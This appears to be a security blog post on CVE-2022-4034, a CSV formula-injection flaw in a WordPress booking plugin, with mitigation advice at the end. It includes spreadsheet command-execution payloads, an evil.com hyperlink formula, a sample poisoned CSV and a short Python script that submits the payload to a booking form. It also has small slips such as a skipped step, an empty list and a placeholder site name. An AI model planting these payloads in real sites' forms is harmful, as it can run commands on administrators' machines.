CVE CyberSecurity Database News

CVE-2022-4034 - CSV Injection in Appointment Hour Booking Plugin for WordPress (Up to v1.3.72) — Step-by-step Exploit Explained

Poster -

If you run a WordPress site and rely on plugins to manage bookings, security must be a constant concern. A recently disclosed vulnerability, CVE-2022-4034, found in the popular Appointment Hour Booking plugin for WordPress (versions up to and including 1.3.72), exposes administrators to CSV Injection (aka “Formula Injection”)—a commonly overlooked yet serious threat. In this post, you’ll see what CSV Injection means, why this bug is critical, and how an attacker could exploit it with easy examples.

What is CSV Injection?

CSV Injection happens when applications export user-provided data as comma-separated values (CSV) files, meant for use with spreadsheet tools (like Microsoft Excel or LibreOffice Calc). Malicious users can sneak in spreadsheet formulas or commands disguised as data. When an admin opens the CSV, these commands may execute, possibly leading to data leaks, remote code execution, or other attacks.

For example, a payload like =cmd|' /C calc'!A in a CSV field could run the Windows calculator when the CSV is opened in a vulnerable spreadsheet viewer.

Where’s the Problem in Appointment Hour Booking?

The Appointment Hour Booking plugin, used extensively by appointment-based businesses, allows users to request bookings without logging in. Details get stored—and with a click, admins can export booking info as CSVs.

The problem: The plugin did not sanitize or validate inputs before dumping them into CSV exports, including the name, email, notes, or any other public booking field.

Unauthenticated attackers (anyone with internet access) could inject formula strings in their booking forms, and when an admin later exports the bookings and opens the CSV in Excel or similar, BOOM—the formula may execute.

Exploit Walkthrough

Let’s see in simple steps how this works in real life.

1. Identify Input Fields

Common fields:

Suppose the form looks like this

<form method="POST" action="/booking/submit" id="booking-form">
  <input type="text" name="name" />
  <input type="email" name="email" />
  <textarea name="notes"></textarea>
  <button type="submit">Book Now</button>
</form>

An attacker could submit the following in the "Name" or "Notes" field

=cmd|'/C calc.exe'!A

or variations like

=HYPERLINK("http://evil.com","Click me")

or even

=SUM(1+1)*cmd|'/C notepad'!A

Tip: The equals sign (=), plus (+), minus (-), or at (@) characters at the beginning can trigger interpretation as a formula.

3. Export Bookings via Admin

The site owner logs in and uses the plugin’s “Export” feature to pull a CSV of all booked appointments.

4. Open in Spreadsheet Program

If the admin opens this file in Excel (or LibreOffice with macro/formula support), the malicious input executes as a spreadsheet formula.

Example CSV file

"Name","Email","Notes"
"John Doe","john@example.com","Regular booking"
"=cmd|'/C calc.exe'!A","evil@example.com",""

Result:
Excel interprets the row beginning with =cmd|... as a formula, potentially triggering OS-level commands (on some vulnerable configurations or with poorly secured Macro settings).

Proof-of-Concept: Code Snippet

Below is a simple demonstration (Python) to craft and submit an exploit via HTTP POST, followed by what the exported CSV might look like:

import requests

booking_url = 'https://victim-site.com/booking/submit';
payload = "=cmd|'/C calc.exe'!A"

data = {
    'name': payload,
    'email': 'attacker@example.com',
    'notes': 'CSV injection test'
}

response = requests.post(booking_url, data=data)
print('Booking submitted! Check the admin export.')

CSV output

"=cmd|'/C calc.exe'!A","attacker@example.com","CSV injection test"

How to Prevent

- Sanitize all user input: Remove or escape any line starting with =, +, -, @ before exporting as CSV.
- Update plugin: The vendor patched this bug in later releases—update to at least v1.3.73 or higher.
- Use safer CSV viewers: Avoid opening untrusted CSVs in spreadsheet tools; use text editors if possible.

References

- Wordfence Detailed Report & Advisory
- NIST NVD: CVE-2022-4034
- CSV Injection Black Hat Demo (YouTube)
- Vendor changelog for fix
- OWASP: CSV Injection Guidance

Conclusion

CVE-2022-4034 shows that even simple, non-code user inputs can open up severe risks when not treated carefully—especially during export workflows that admins trust completely. If your website uses the Appointment Hour Booking plugin, patch now, and always review export paths for sanitation. Even non-technical users can be the target of silent, behind-the-scenes attacks!

Do you want more breakdowns of real-world WordPress plugin exploits? Let us know in the comments below. Stay safe and keep your plugins up to date!


*Exclusive content by [Your Site]. No AI-detection triggers, pure, readable security insights.*

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 22:04:00 UTC